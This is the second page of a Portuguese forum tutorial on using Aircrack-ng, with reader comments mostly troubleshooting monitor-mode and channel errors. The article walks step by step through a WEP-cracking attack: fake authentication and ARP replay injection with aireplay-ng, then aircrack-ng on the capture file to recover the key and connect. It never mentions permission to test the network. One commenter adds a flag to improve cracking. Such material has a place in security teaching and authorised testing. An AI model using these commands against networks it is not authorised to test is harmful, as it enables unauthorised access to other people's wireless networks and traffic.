Como utilizar o Aircrack-ng

Mostrarei a vocês, de uma forma simples, prática e rápida, como utilizar o Aircrack-ng e seus derivados.

[ Hits: 174.126 ]

Por: Danilo em 25/01/2012


Injetando pacotes e se preparando para o ataque



Vamos, agora nesta parte, começar a injetar os pacotes na nossa rede com o Aireplay-ng, que tem a função de injetar frames e gerar tráfego de rede.

O Aireplay-ng utiliza vários métodos de ataques, mas vamos usar o do tipo autenticação falsa.

Cuidado: Mesmo já atingindo os 5000 pacotes com o Airodump, deixe ele capturando mais, não feche a janela!! Para fazer esta outra etapa, abra uma nova aba ou um novo terminal!

Primeiro você deve saber o MAC da sua placa Wireless, para isto dê o comando:

# ifconfig wlan0

Serão uns números, tipo o BSSID que são separados por dois pontos, e estão logo na primeira linha.

Com isso, dê o comando:

# aireplay-ng -1 0 -a bssid_da_rede -h seu_mac mon0

Resumindo: '-1' é o tipo de ataque, no nosso caso a autenticação falsa.

0 *mals, pois esqueci!

O resto nem precisa explicar.

Agora, se der tudo certo, beleza.

Vamos agora injetar pacotes ARP na rede, para começar a gerar tráfego.

Para isto, dê o comando:

# aireplay-ng -3 -b bssid da rede -h seu mac mon0 Resumindo: '-3' diz ao Aireplay que iremos injetar os pacotes ARP.

Se der tudo certo, ele vai começar a injetar os pacotes, espere que você tenha resposta de algum pacote ARP, mas lembre-se, não feche este terminal também, abra agora uma nova aba ou um novo terminal.

Agora vamos adiante, onde iremos para a quebra da senha com o Aircrack!

Atacando a rede

Bem, com tudo já feito, já está na hora de começarmos a atacar a rede Wireless para descobrirmos a senha.

Vamos lá, dê o comando:

# aircrack-ng -a 1 -b bssid_da_rede exemplo-01.cap

Resumindo: '-a 1' é o método de ataque que estamos indicando ao Aircrack, que é para quebra de chaves WEP.

Em e'xemplo-o1.cap', é o nome do arquivo de captura que geramos com o Airodump, todos eles vão ser assim: nome do arquivo-01.cap.

Pronto! O ataque está sendo feito, se o Aircrack não conseguir, ele esperará até que você capture mais pacotes. E por aí vai. Na hora que descobrir a senha, mande este último comando e feche tudo:

# airmon-ng stop wlan0

A senha que o Aircrack acha, é separada por dois pontos, basta você apagar os dois pontos e se conectar!

Boa sorte!
Qualquer dúvida, comentem!!!
Página anterior    

Páginas do artigo
   1. Introdução e instalação
   2. Injetando pacotes e se preparando para o ataque
Outros artigos deste autor
Nenhum artigo encontrado.
Leitura recomendada

A Desinformação em Época da Tecnologia de Informação

Servidor web com CentOS + Apache

Criando um pinguim móvel com Fedora Core 1 e Siemens M50

SpamAssassin no Sendmail usando o Procmail

Conceitos de Acesso Remoto

  
Comentários
[1] Comentário enviado por josedefaria em 25/01/2012 - 12:03h

cara meu sistema eh o debian squeeze e nao consigo baixar o pacote, existe alguma source list específica para o aircrack?

[2] Comentário enviado por danilo m galhard em 25/01/2012 - 12:54h

Olá josedefaria,

Você pode estar baixando o aircrack-ng diretamente do site do aircrack, ou baixando seu source para compilá-lo:

Vou estar me baseando no Ubuntu:
(Antes, vire root)
Abra o terminal:

mkdir tmp //vamos criar um diretório temporário
cd tmp //para entrar na pasta

apt-get source aircrack-ng

cd aircrack-ng-1.1


Vamos agora compilá-lo:

dpkg-buildpackage

Se der tudo certo, verás uma mensagem como esta:

dpkg-deb: building package `aircrack-ng' in `../aircrack-ng_1.1-1.1_amd64.deb'.
dpkg-genchanges >../aircrack-ng_1.1-1.1_amd64.changes
dpkg-genchanges: not including original source code in upload
dpkg-source --after-build aircrack-ng-1.1
dpkg-buildpackage: binary and diff upload (original source NOT included).

Pronto, agora é só usar, qualquer coisa, posta aqui de novo.


[3] Comentário enviado por julio_hoffimann em 25/01/2012 - 15:18h

Oi Danilo, parabéns!

Abraço!

[4] Comentário enviado por leovailati em 25/01/2012 - 17:22h

Só queria adicionar aqui uma dica para quebrar WEP: usar o argumento -f com um valor bem alto no aircrack-ng, tipo 100 ou 200. O programa vai levar mais tempo para encontrar a senha, mas tem mais chances de quebrar de primeira mesmo com poucos ivs.

[5] Comentário enviado por netotst em 25/01/2012 - 19:23h

Segue os logs


wlan0 Link encap:Ethernet Endereço de HW 00:0d:f0:94:10:07
UP BROADCAST MULTICAST MTU:1500 Métrica:1
pacotes RX:0 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:0 erros:0 descartados:0 excesso:0 portadora:0
colisões:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Nas últimas linhas, deverá estar escrito assim:
modo monitor enable mon0
Ou seja não aparece essa sua descrição.

quando dou o comando

airodump-ng monO
Interface monO:
ioctl(SIOCGIFINDEX) failed: No such device

Aparece isso puts e agora?


[6] Comentário enviado por danilo m galhard em 25/01/2012 - 20:00h

Você tem certeza que sua interface wireless é o wlan0?

Se não for, tente fazer o seguinte:

liste todos os seus dispositivos com o comando ifconfig.

Depois, use o airmong-ng para parar todos eles, menos o da sua interface wireless:

Ex:

airmon-ng stop eth0

Tente fazer isto

[7] Comentário enviado por netotst em 26/01/2012 - 05:08h

O comando certo seria airmon-ng ok?


airmon-ng


Interface Chipset Driver

wlan0 Unknown rtl8192se - [phy0]

[8] Comentário enviado por danilo m galhard em 26/01/2012 - 08:44h

Sim,

Você deve ter digitado airmong-ng, certo?

E muito facil se confundir!

Mas agora ta tudo blz?

[9] Comentário enviado por kadutbj em 26/01/2012 - 23:47h

Mano eu faço tudo certinho...no meu caso estou usando not então ele a minha placa wirelles seria eth1, mas nunca consigo colocar ele para buscar redes...olha o que ele diz:


root@kadu:~# airmon-ng start eth1


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
780 avahi-daemon
781 avahi-daemon
782 NetworkManager
934 wpa_supplicant


Interface Chipset Driver

eth1 Unknown wl (monitor mode enabled)


root@kadu:~# airodump-ng eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
Sysfs injection support was not found either.

root@kadu:~#

Ele habilita o modo monitor mas não gera uma nova interface....vi uns caras falando e ensinando como usar o eth1 mas não consigo, voce tem alguma dica???

[10] Comentário enviado por danilo m galhard em 27/01/2012 - 08:09h

Você tem certeza? Eu também usi not, e minha interface é wlan0.

Me faz um favor, manda o comando ifconfig, e cola aqui os resultados para eu ver por favor.

[11] Comentário enviado por Lisandro em 27/01/2012 - 08:13h

Boa. Há um tempo levei uma surra para usar o Aircrack, o artigo ficou muito bom. Parabéns!

[12] Comentário enviado por Lisandro em 27/01/2012 - 08:17h

Amigo "netotst" a interface é "mon0" (com o número zero) e não "monO" (com a letra O). Abraço.

[13] Comentário enviado por netotst em 27/01/2012 - 10:01h

Oi Lisandro eu coloquei com número 0 e não com a letra O

[14] Comentário enviado por kadutbj em 28/01/2012 - 17:09h

root@kadu:~# ifconfig
eth0 Link encap:Ethernet Endereço de HW 00:26:6c:be:70:b7
UP BROADCAST MULTICAST MTU:1500 Métrica:1
pacotes RX:0 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:0 erros:0 descartados:0 excesso:0 portadora:0
colisões:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
IRQ:43

eth1 Link encap:Ethernet Endereço de HW b4:74:9f:dd:7f:98
endereço inet6: fe80::b674:9fff:fedd:7f98/64 Escopo:Link
UP BROADCAST MULTICAST MTU:1500 Métrica:1
pacotes RX:0 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:0 erros:0 descartados:0 excesso:0 portadora:0
colisões:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
IRQ:17

lo Link encap:Loopback Local
inet end.: 127.0.0.1 Masc:255.0.0.0
endereço inet6: ::1/128 Escopo:Máquina
UP LOOPBACK RUNNING MTU:16436 Métrica:1
pacotes RX:126 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:126 erros:0 descartados:0 excesso:0 portadora:0
colisões:0 txqueuelen:0
RX bytes:9874 (9.8 KB) TX bytes:9874 (9.8 KB)

ppp0 Link encap:Protocolo Ponto-a-Ponto
inet end.: 172.18.28.3 P-a-P:10.64.64.64 Masc:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Métrica:1
pacotes RX:1627 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:1674 erros:0 descartados:0 excesso:0 portadora:0
colisões:0 txqueuelen:3
RX bytes:1589462 (1.5 MB) TX bytes:198204 (198.2 KB)

[15] Comentário enviado por jwarcos em 31/01/2012 - 23:45h

Olá a todos,

Só fazendo um adendo ao artigo do danilo, alguns chipsets de antenas wireless não permitem o modo promíscuo (monitor) com driver nativo, sendo então necessária a instalação do driver madwifi disponível em http://madwifi-project.org/.
A maioria dos notebooks comercializados atualmente utilizam o chipset Atheros, que funcionam perfeitamente em modo promíscuo, exceto pelo fato de por natureza o modo monitor já ser bastante instável. É importante salientar ainda que na maioria dos casos (se não todos), no modo promíscuo a placa só recebe pacotes e deixa de enviá-los, ou seja, torna-se inviável o uso da internet.
Alternativamente aos comandos citados pelo autor do artigo, podemos utilizar:
Para descobrirmos as redes ao alcance em alternativa ao comando:
# airodump-ng mon0

Podemos utilizar:
# iwlist wlan0 scan

Para colocar a interface em modo promiscuo:
No lugar de:
# airmon-ng start wlan0

Utilizar:
# iwconfig wlan0 mode monitor

Se o comando retornar:
# iwconfig wlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; Device or resource busy.

Basta "derrubar" a interface antes de utilizar:
# ifconfig wlan0 down

E "levantá-la" logo após com o comando:
# ifconfig wlan0 up

Para retornar ao modo normal:
# iwconfig wlan0 mode managed

Se ocorrer o erro acima, basta repetir o procedimento.

Bom, é isso pessoal, espero ter ajudado!

[16] Comentário enviado por vinicius.almeida em 10/02/2012 - 17:19h

boa :)

[17] Comentário enviado por kadutbj em 28/02/2012 - 22:37h

Bom amigos ja tentei de tudo, mas definitivamente nao gera uma nova interface....fiz um teste com uma antena usb e deu certo, ele gera uma nova interface e tal..pq sera que o meu not nao gera???

[18] Comentário enviado por moisaport em 18/05/2012 - 12:41h

Tá dando erro aqui. Não faço idéia do que é já tentei de tudo. Afirma que é um erro de canal, mas estou colocando para o canal 6.
airodump-ng --channel x --bssid zz:zz:zz:zz:zz:zz -w exemplo mon0
nesse aí de cima no lugar do x eu coloco o canal 6, mas da o erro abaixo. O que será isso???????? Agradecido desde já.


root@moisaport-IS-1412:/home/moisaport# aireplay-ng -3 -b 00:1D:0F:FE:0F:EC -h 00:17:c4:9f:cf:70 mon0
12:21:17 Waiting for beacon frame (BSSID: 00:1D:0F:FE:0F:EC) on channel -1
12:21:17 mon0 is on channel -1, but the AP uses channel 6

[19] Comentário enviado por 2008reginaldo em 24/02/2013 - 15:29h

Cara... Tive o mesmo problema que vc (moisaport). A msg de erro diz que sua placa mon0 esta no canal -1 (estranho isso mas tudo bem) mas o AP esta no canal 6.
Eu tentei colocar a interface no canal 6 também (sudo iwconfig mon0 channel 6), ok! Agora tanto a placa como o AP deveriam estar no mesmo canal mas... Sei lá, ainda continuo tendo o mesmo erro.
Se alguém tiver alguma idéia aí seria massa.
Abraço a todos

[20] Comentário enviado por rodrigolocano em 30/05/2013 - 05:07h

Testando!
:)

[21] Comentário enviado por lennonvalle em 20/07/2013 - 00:49h

Olá pessoal.

Estou usando backtrack 5 r3 em uma maquina virtual. Estou tentando este procedimento com uma placa usb, porém quando tento colocar a placa em modo monitor não aparece "mode monitor enabled mon0". ela aparece listada normalmente como wlan0, mas apos o comando do airmon-ng aparece isto:

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
855 dhclient3
2037 dhclient3


Interface Chipset Driver


Minha placa eh uma C3 Tech W-U3300nL

Realtek RTL8191SU

Qual será o problema?

[22] Comentário enviado por vigia122 em 21/07/2013 - 01:01h

Fiz como explicado e obtive o seguinte erro quando fui enviar a autenticacão falsa:

root@vitor-Satellite-X205:/home/vitor# aireplay-ng -1 6 -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0
00:51:45 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1
00:51:45 mon0 is on channel -1, but the AP uses channel 6

[23] Comentário enviado por sabosilva em 11/09/2014 - 08:23h

Fiz o passo a passo tudo certinho, mas ele mostra o seguinte erro

08:14:57 Waiting for beacon frame (BSSID: 1C:7E:E5:BF:62:20) on channel -1
08:14:57 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).


o que seria esse erro ?

[24] Comentário enviado por penha123 em 23/03/2015 - 20:23h

Meu problema é parecido com o do ultimo que questinou.
Agradeço a resposta dês de já, Muito obrigado!

[25] Comentário enviado por diegomard em 06/08/2016 - 15:24h

Ola amigo,

Não estou conseguindo colocar minha placa wirelles em modo de monitoramento apresenta a seguinte mensagem:

Interface Chipset Driver

wlan0 ath9k - [phy0]/usr/local/sbin/airmon-ng: 338: /usr/local/sbin/airmon-ng: cannot create /sys/class/ieee80211/phy0/add_iface: Directory nonexistent
mon0: ERROR while getting interface flags: Dispositivo inexistente

(monitor mode enabled on mon0)

root@debianportable:/home/diegomd# Error for wireless request "Set Mode" (8B06) :
SET failed on device mon0 ; No such device.

Poderia me ajudar, desde ja agradeco a atenção.

[26] Comentário enviado por S1C4 em 12/08/2019 - 01:33h

Não consigo fazer a rede voltar ao normal, por favor me ajudem sou novata aqui

[27] Comentário enviado por S1C4 em 12/08/2019 - 01:41h


[26] Comentário enviado por S1C4 em 12/08/2019 - 01:33h

Não consigo fazer a rede voltar ao normal, por favor me ajudem sou novata aqui


Resolvi com:
service network-manager restart


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts